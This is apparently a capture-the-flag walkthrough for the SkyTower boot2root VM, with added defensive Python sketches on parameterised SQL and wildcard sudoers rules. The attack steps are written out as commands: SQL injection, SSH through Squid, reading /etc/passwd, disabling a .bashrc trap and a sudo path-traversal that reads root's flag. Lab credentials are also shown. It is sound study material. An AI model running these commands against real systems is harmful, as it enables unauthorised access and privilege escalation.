Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-28 23:18 EEST
Nmap scan report for 192.168.74.134
Host is up (0.00075s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE
22/tcp   filtered ssh
80/tcp   open     http
3128/tcp open     squid-http
Let's examine port 80:
SQL injection?
Let's try to find out:
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1]
Post data of the malicious request.
For security reasons, you must login to the SkyTech server via SSH to access the account details.
Username: john
Email: [email protected]
Password: hereisjohn
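The MySQL error above is the classic sign of untrusted form input spliced into a SQL string, and echoing the driver's message to the browser is what confirmed it. As an added example (not code from the SkyTower VM or its login.php; the SQLite backend, the users table and the john@example.invalid address are constructed stand-ins, and passwords are kept in plaintext only to mirror what the page's application stored), the sketch below puts the vulnerable concatenation beside the parameterised form and classifies outcomes without leaking the driver's message:

```python
import sqlite3

# Constructed sample data for an offline demo. The page's own application used
# MySQL via mysqli; SQLite stands in for it here.
SAMPLE_USERS = [
    ("john@example.invalid", "hereisjohn"),  # constructed address, password as on the page
]


def make_db():
    """Build an in-memory SQLite database standing in for the SkyTech users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, email, password):
    """Vulnerable pattern: user input spliced into the SQL text.

    A single quote in either field changes the statement structure and the
    driver raises a syntax error, which is what login.php echoed to the browser.
    """
    sql = ("SELECT email FROM users WHERE email = '" + email +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def login_param(conn, email, password):
    """Hardened pattern: placeholders, with values bound by the driver.

    Input is only ever data, so a quote cannot alter the query; an unknown
    user simply fails to authenticate.
    """
    sql = "SELECT email FROM users WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchone()


def login_result(fn, email, password):
    """Run a login function and classify the outcome as 'ok', 'denied' or
    'error'. The driver's own message is deliberately not returned: that is
    the detail the page's application should never have shown the client."""
    conn = make_db()
    try:
        row = fn(conn, email, password)
    except sqlite3.Error:
        return "error"
    return "ok" if row else "denied"


if __name__ == "__main__":
    print(login_result(login_concat, "'", "x"))    # error (what the page observed)
    print(login_result(login_param, "'", "x"))     # denied
    print(login_result(login_param, "john@example.invalid", "hereisjohn"))  # ok
```

The concatenated version turns a lone quote into a syntax error; the parameterised version treats the same input as an email address that does not exist. The real fix for the page's login.php is the same move in PHP (mysqli prepared statements), plus hashing the stored passwords so a successful injection could not return them in clear.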
The SSH port is filtered and Squid is installed on the server. I added the following 2 lines to my ~/.ssh/config file:
Host 192.168.74.134
    ProxyCommand corkscrew 192.168.74.134 3128 %h %p
So I am using corkscrew to have an SSH connection over Squid.
ssh [email protected]
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Jun 28 17:18:32 2014 from 192.168.74.134
Funds have been withdrawn
Connection to 192.168.74.134 closed.
It logs in normally, but I don't have time to execute a command. Then I tried:
ssh [email protected] "cat /etc/passwd"
I found 2 more users in the passwd file:
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash
Now that I know the company's email format ([email protected]), I can try the other usernames in the first form.
In order to get a shell, I have to change the .bashrc file that closes the connection.
ssh [email protected] "mv /home/sara/.bashrc /home/sara/.bashrc_backup"
After logging in, I typed:
sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
The use of asterisks in the sudoers file is dangerous, as here: the glob /accounts/* also matches paths that traverse out of /accounts.
sudo ls /accounts/../root/
flag.txt

sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
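As an added example, not part of the original writeup, the script below audits the command list from the sudo -l output above for wildcard arguments, shows with Python's fnmatch why the /accounts/* glob accepts /accounts/../root/flag.txt, and contrasts the canonicalising check a wrapper script would make instead of a glob. The CMND_SPECS string is reconstructed from the page; the function names and the /accounts/john.txt sample path are mine.

```python
import fnmatch
import os
import re

# Reconstructed from the 'sudo -l' output on the page: the command list sara may run.
CMND_SPECS = "(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*"

# One sudo -l entry: "(runas) [TAG: ...] /path/to/binary args..."
SPEC_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)")
WILDCARDS = set("*?[")


def audit_cmnd_specs(specs):
    """Split a sudo -l command list and flag entries whose arguments contain
    glob metacharacters. Returns one dict per entry, in order."""
    findings = []
    for raw in specs.split(", "):
        m = SPEC_RE.match(raw.strip())
        if not m:
            continue
        parts = m.group("cmd").split()
        binary, args = parts[0], parts[1:]
        findings.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "binary": binary,
            "args": args,
            "wildcard_args": [a for a in args if WILDCARDS & set(a)],
        })
    return findings


def sudo_would_match(pattern, argument):
    """sudo compares command arguments with fnmatch(3) without FNM_PATHNAME,
    so '*' also matches '/' and '/accounts/*' accepts '/accounts/../root/x',
    which is exactly what the walkthrough above exploited. Python's fnmatch
    behaves the same way, so it models the sudoers check faithfully."""
    return fnmatch.fnmatch(argument, pattern)


def inside_directory(path, base):
    """The check a wrapper script should make instead of a glob: canonicalise
    the requested path (.. components and symlinks resolved) and require it to
    stay at or under base."""
    real = os.path.realpath(path)
    base = os.path.realpath(base)
    return real == base or real.startswith(base + os.sep)


if __name__ == "__main__":
    for entry in audit_cmnd_specs(CMND_SPECS):
        if entry["wildcard_args"]:
            print("wildcard argument in sudoers rule:", entry["binary"], entry["wildcard_args"])
    print(sudo_would_match("/accounts/*", "/accounts/../root/flag.txt"))   # True
    print(inside_directory("/accounts/../root/flag.txt", "/accounts"))    # False
    print(inside_directory("/accounts/john.txt", "/accounts"))            # True
```

The audit flags both of sara's rules, the cat rule additionally as NOPASSWD. The safer sudoers shape is a rule that names a fixed wrapper script (no wildcard arguments at all), with the wrapper doing the inside_directory check before it reads anything.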
And we are root! It was an entry-level boot2root, but it has some unique 'features' like the use of Squid.
MySQL credentials as a bonus:
cat /var/www/login.php | grep mysql
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');